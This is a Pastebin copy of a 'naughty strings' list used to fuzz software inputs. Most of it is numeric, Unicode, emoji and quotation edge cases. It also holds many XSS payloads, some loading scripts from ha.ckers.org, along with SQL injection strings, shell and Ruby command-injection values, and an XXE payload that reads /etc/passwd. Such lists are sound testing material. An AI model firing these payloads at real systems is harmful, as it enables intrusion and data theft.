Advertisement
TheJambo

Naughty Strings

Apr 19th, 2016
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.45 KB | None | 0 0
  1. # Reserved Strings
  2. # Strings which may be used elsewhere in code
  3.  
  4. undefined
  5. undef
  6. null
  7. NULL
  8. (null)
  9. nil
  10. NIL
  11. true
  12. false
  13. True
  14. False
  15. None
  16. hasOwnProperty
  17. \
  18. \\
  19.  
  20. # Numeric Strings
  21. #
  22. # Strings which can be interpreted as numeric
  23.  
  24. 0
  25. 1
  26. 1.00
  27. $1.00
  28. 1/2
  29. 1E2
  30. 1E02
  31. 1E+02
  32. 1e+99
  33. -1
  34. -1.00
  35. -$1.00
  36. -1/2
  37. -1E2
  38. -1E02
  39. -1E+02
  40. 1e-99
  41. 1/0
  42. 0/0
  43. -2147483648/-1
  44. -9223372036854775808/-1
  45. 0.00
  46. 0..0
  47. .
  48. 0.0.0
  49. 0,00
  50. 0,,0
  51. ,
  52. 0,0,0
  53. 0.0/0
  54. 1.0/0.0
  55. 0.0/0.0
  56. 1,0/0,0
  57. 0,0/0,0
  58. --1
  59. -
  60. -.
  61. -,
  62. 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
  63. NaN
  64. Infinity
  65. -Infinity
  66. INF
  67. 1#INF
  68. -1#IND
  69. 1#QNAN
  70. 1#SNAN
  71. 1#IND
  72. 0x0
  73. 0xffffffff
  74. 0xffffffffffffffff
  75. 0xabad1dea
  76. 123456789012345678901234567890123456789
  77. 1,000.00
  78. 1 000.00
  79. 1'000.00
  80. 1,000,000.00
  81. 1 000 000.00
  82. 1'000'000.00
  83. 1.000,00
  84. 1 000,00
  85. 1'000,00
  86. 1.000.000,00
  87. 1 000 000,00
  88. 1'000'000,00
  89. 01000
  90. 08
  91. 09
  92. 2.2250738585072011e-308
  93.  
  94. # Special Characters
  95. #
  96. # Strings which contain common special ASCII characters (may need to be escaped)
  97.  
  98. ,./;'[]\-=
  99. <>?:"{}|_+
  100. !@#$%^&*()`~
  101.  
  102. # Unicode Symbols
  103. #
  104. # Strings which contain common unicode symbols (e.g. smart quotes)
  105.  
  106. Ω≈ç√∫˜µ≤≥÷
  107. åß∂ƒ©˙∆˚¬…æ
  108. œ∑´®†¥¨ˆøπ“‘
  109. ¡™£¢∞§¶•ªº–≠
  110. ¸˛Ç◊ı˜Â¯˘¿
  111. ÅÍÎÏ˝ÓÔÒÚÆ☃
  112. Œ„´‰ˇÁ¨ˆØ∏”’
  113. `⁄€‹›fifl‡°·‚—±
  114. ⅛⅜⅝⅞
  115. ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
  116. ٠١٢٣٤٥٦٧٨٩
  117.  
  118. # Unicode Subscript/Superscript
  119. #
  120. # Strings which contain unicode subscripts/superscripts; can cause rendering issues
  121.  
  122. ⁰⁴⁵
  123. ₀₁₂
  124. ⁰⁴⁵₀₁₂
  125.  
  126. # Quotation Marks
  127. #
  128. # Strings which contain misplaced quotation marks; can cause encoding errors
  129.  
  130. '
  131. "
  132. ''
  133. ""
  134. '"'
  135. "''''"'"
  136. "'"'"''''"
  137. <foo val=“bar” />
  138. <foo val=“bar” />
  139. <foo val=”bar“ />
  140. <foo val=`bar' />
  141.  
  142. # Two-Byte Characters
  143. #
  144. # Strings which contain two-byte characters: can cause rendering issues or character-length issues
  145.  
  146. 田中さんにあげて下さい
  147. パーティーへ行かないか
  148. 和製漢語
  149. 部落格
  150. 사회과학원 어학연구소
  151. 찦차를 타고 온 펲시맨과 쑛다리 똠방각하
  152. 社會科學院語學研究所
  153. 울란바토르
  154. 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
  155.  
  156. # Japanese Emoticons
  157. #
  158. # Strings which consists of Japanese-style emoticons which are popular on the web
  159.  
  160. ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
  161. (。◕ ∀ ◕。)
  162. `ィ(´∀`∩
  163. __ロ(,_,*)
  164. ・( ̄∀ ̄)・:*:
  165. ゚・✿ヾ╲(。◕‿◕。)╱✿・゚
  166. ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
  167. (╯°□°)╯︵ ┻━┻)
  168. (ノಥ益ಥ)ノ ┻━┻
  169. ( ͡° ͜ʖ ͡°)
  170.  
  171. # Emoji
  172. #
  173. # Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
  174.  
  175. 😍
  176. 👩🏽
  177. 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
  178. 🐵 🙈 🙉 🙊
  179. ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
  180. ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
  181. 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
  182. 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
  183.  
  184. # Regional Indicator Symbols
  185. #
  186. # Regional Indicator Symbols can be displayed differently across
  187. # fonts, and have a number of special behaviors
  188.  
  189. 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
  190. 🇺🇸🇷🇺🇸🇦🇫🇦🇲
  191. 🇺🇸🇷🇺🇸🇦
  192.  
  193. # Unicode Numbers
  194. #
  195. # Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
  196.  
  197. 123
  198. ١٢٣
  199.  
  200. # Right-To-Left Strings
  201. #
  202. # Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
  203.  
  204. ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
  205. בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
  206. הָיְתָהtestالصفحات التّحول
  207. مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
  208. # Unicode Spaces
  209. #
  210. # Strings which contain unicode space characters with special properties (c.f. https://www.cs.tut.fi/~jkorpela/chars/spaces.html)
  211.  
  212.  
  213. 
  214.  
  215. # Trick Unicode
  216. #
  217. # Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
  218.  
  219. ‪‪test‪
  220. ‫test‫
  221. 
test

  222. test⁠test‫
  223. ⁦test⁧
  224.  
  225. # Zalgo Text
  226. #
  227. # Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
  228.  
  229. Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
  230. ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
  231. ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
  232. ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
  233. Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
  234.  
  235. # Unicode Upsidedown
  236. #
  237. # Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com)
  238.  
  239. ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
  240. 00˙Ɩ$-
  241.  
  242. # Unicode font
  243. #
  244. # Strings which contain bold/italic/etc. versions of normal characters
  245.  
  246. The quick brown fox jumps over the lazy dog
  247. 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠
  248. 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌
  249. 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈
  250. 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰
  251. 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘
  252. 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐
  253. ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢
  254.  
  255. # Script Injection
  256. #
  257. # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
  258.  
  259. <script>alert(123)</script>
  260. &lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
  261. <img src=x onerror=alert(123) />
  262. <svg><script>123<1>alert(123)</script>
  263. "><script>alert(123)</script>
  264. '><script>alert(123)</script>
  265. ><script>alert(123)</script>
  266. </script><script>alert(123)</script>
  267. < / script >< script >alert(123)< / script >
  268. onfocus=JaVaSCript:alert(123) autofocus
  269. " onfocus=JaVaSCript:alert(123) autofocus
  270. ' onfocus=JaVaSCript:alert(123) autofocus
  271. <script>alert(123)</script>
  272. <sc<script>ript>alert(123)</sc</script>ript>
  273. --><script>alert(123)</script>
  274. ";alert(123);t="
  275. ';alert(123);t='
  276. JavaSCript:alert(123)
  277. ;alert(123);
  278. src=JaVaSCript:prompt(132)
  279. "><script>alert(123);</script x="
  280. '><script>alert(123);</script x='
  281. ><script>alert(123);</script x=
  282. " autofocus onkeyup="javascript:alert(123)
  283. ' autofocus onkeyup='javascript:alert(123)
  284. <script\x20type="text/javascript">javascript:alert(1);</script>
  285. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  286. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  287. <script\x09type="text/javascript">javascript:alert(1);</script>
  288. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  289. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  290. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  291. '`"><\x3Cscript>javascript:alert(1)</script>
  292. '`"><\x00script>javascript:alert(1)</script>
  293. ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
  294. ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
  295. ABC<div style="x:expression\x00(javascript:alert(1)">DEF
  296. ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
  297. ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
  298. ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
  299. ABC<div style="x:\x09expression(javascript:alert(1)">DEF
  300. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
  301. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
  302. ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
  303. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
  304. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
  305. ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
  306. ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
  307. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
  308. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
  309. ABC<div style="x:\x20expression(javascript:alert(1)">DEF
  310. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
  311. ABC<div style="x:\x00expression(javascript:alert(1)">DEF
  312. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
  313. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
  314. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
  315. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
  316. ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
  317. ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
  318. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
  319. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
  320. <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  321. <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  322. <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  323. <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  324. <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  325. <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  326. <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  327. <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  328. <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  329. <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  330. <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  331. <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  332. <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  333. <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  334. <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  335. <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  336. <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  337. <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  338. <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  339. <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  340. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  341. <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  342. <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  343. <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  344. <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  345. <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  346. <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  347. <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  348. <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  349. <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  350. <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  351. <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  352. <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  353. <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  354. <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  355. <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  356. <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  357. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  358. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  359. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  360. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  361. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  362. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  363. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  364. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  365. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  366. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  367. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  368. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  369. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  370. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  371. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  372. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  373. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  374. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  375. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  376. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  377. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  378. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  379. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  380. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  381. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  382. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  383. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  384. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  385. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  386. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  387. "`'><script>\x3Bjavascript:alert(1)</script>
  388. "`'><script>\x0Djavascript:alert(1)</script>
  389. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  390. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  391. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  392. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  393. "`'><script>\x09javascript:alert(1)</script>
  394. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  395. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  396. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  397. "`'><script>\x00javascript:alert(1)</script>
  398. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  399. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  400. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  401. "`'><script>\x0Cjavascript:alert(1)</script>
  402. "`'><script>\x2Bjavascript:alert(1)</script>
  403. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  404. "`'><script>-javascript:alert(1)</script>
  405. "`'><script>\x0Ajavascript:alert(1)</script>
  406. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  407. "`'><script>\x7Ejavascript:alert(1)</script>
  408. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  409. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  410. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  411. "`'><script>\xC2\x85javascript:alert(1)</script>
  412. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  413. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  414. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  415. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  416. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  417. "`'><script>\x21javascript:alert(1)</script>
  418. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  419. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  420. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  421. "`'><script>\x0Bjavascript:alert(1)</script>
  422. "`'><script>\x20javascript:alert(1)</script>
  423. "`'><script>\xC2\xA0javascript:alert(1)</script>
  424. <img \x00src=x onerror="alert(1)">
  425. <img \x47src=x onerror="javascript:alert(1)">
  426. <img \x11src=x onerror="javascript:alert(1)">
  427. <img \x12src=x onerror="javascript:alert(1)">
  428. <img\x47src=x onerror="javascript:alert(1)">
  429. <img\x10src=x onerror="javascript:alert(1)">
  430. <img\x13src=x onerror="javascript:alert(1)">
  431. <img\x32src=x onerror="javascript:alert(1)">
  432. <img\x47src=x onerror="javascript:alert(1)">
  433. <img\x11src=x onerror="javascript:alert(1)">
  434. <img \x47src=x onerror="javascript:alert(1)">
  435. <img \x34src=x onerror="javascript:alert(1)">
  436. <img \x39src=x onerror="javascript:alert(1)">
  437. <img \x00src=x onerror="javascript:alert(1)">
  438. <img src\x09=x onerror="javascript:alert(1)">
  439. <img src\x10=x onerror="javascript:alert(1)">
  440. <img src\x13=x onerror="javascript:alert(1)">
  441. <img src\x32=x onerror="javascript:alert(1)">
  442. <img src\x12=x onerror="javascript:alert(1)">
  443. <img src\x11=x onerror="javascript:alert(1)">
  444. <img src\x00=x onerror="javascript:alert(1)">
  445. <img src\x47=x onerror="javascript:alert(1)">
  446. <img src=x\x09onerror="javascript:alert(1)">
  447. <img src=x\x10onerror="javascript:alert(1)">
  448. <img src=x\x11onerror="javascript:alert(1)">
  449. <img src=x\x12onerror="javascript:alert(1)">
  450. <img src=x\x13onerror="javascript:alert(1)">
  451. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  452. <img src=x onerror=\x09"javascript:alert(1)">
  453. <img src=x onerror=\x10"javascript:alert(1)">
  454. <img src=x onerror=\x11"javascript:alert(1)">
  455. <img src=x onerror=\x12"javascript:alert(1)">
  456. <img src=x onerror=\x32"javascript:alert(1)">
  457. <img src=x onerror=\x00"javascript:alert(1)">
  458. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  459. <img src="x` `<script>javascript:alert(1)</script>"` `>
  460. <img src onerror /" '"= alt=javascript:alert(1)//">
  461. <title onpropertychange=javascript:alert(1)></title><title title=>
  462. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  463. <!--[if]><script>javascript:alert(1)</script -->
  464. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  465. <script src="/\%(jscript)s"></script>
  466. <script src="\\%(jscript)s"></script>
  467. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  468. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  469. <IMG SRC=# onmouseover="alert('xxs')">
  470. <IMG SRC= onmouseover="alert('xxs')">
  471. <IMG onmouseover="alert('xxs')">
  472. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  473. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  474. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  475. <IMG SRC="jav ascript:alert('XSS');">
  476. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  477. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  478. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  479. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  480. <IMG SRC=" &#14; javascript:alert('XSS');">
  481. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  482. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  483. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  484. <<SCRIPT>alert("XSS");//<</SCRIPT>
  485. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  486. <SCRIPT SRC=//ha.ckers.org/.j>
  487. <IMG SRC="javascript:alert('XSS')"
  488. <iframe src=http://ha.ckers.org/scriptlet.html <
  489. \";alert('XSS');//
  490. <u oncopy=alert()> Copy me</u>
  491. <i onwheel=alert(1)> Scroll over me </i>
  492. <plaintext>
  493. http://a/%%30%30
  494.  
  495. # SQL Injection
  496. #
  497. # Strings which can cause a SQL injection if inputs are not sanitized
  498.  
  499. 1;DROP TABLE users
  500. 1'; DROP TABLE users-- 1
  501. ' OR 1=1 -- 1
  502. ' OR '1'='1
  503.  
  504. %
  505. _
  506.  
  507. # Server Code Injection
  508. #
  509. # Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
  510.  
  511. -
  512. --
  513. --version
  514. --help
  515. $USER
  516. /dev/null; touch /tmp/blns.fail ; echo
  517. `touch /tmp/blns.fail`
  518. $(touch /tmp/blns.fail)
  519. @{[system "touch /tmp/blns.fail"]}
  520.  
  521. # Command Injection (Ruby)
  522. #
  523. # Strings which can call system commands within Ruby/Rails applications
  524.  
  525. eval("puts 'hello world'")
  526. System("ls -al /")
  527. `ls -al /`
  528. Kernel.exec("ls -al /")
  529. Kernel.exit(1)
  530. %x('ls -al /')
  531.  
  532. # XXE Injection (XML)
  533. #
  534. # String which can reveal system files when parsed by a badly configured XML parser
  535.  
  536. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
  537.  
  538. # Unwanted Interpolation
  539. #
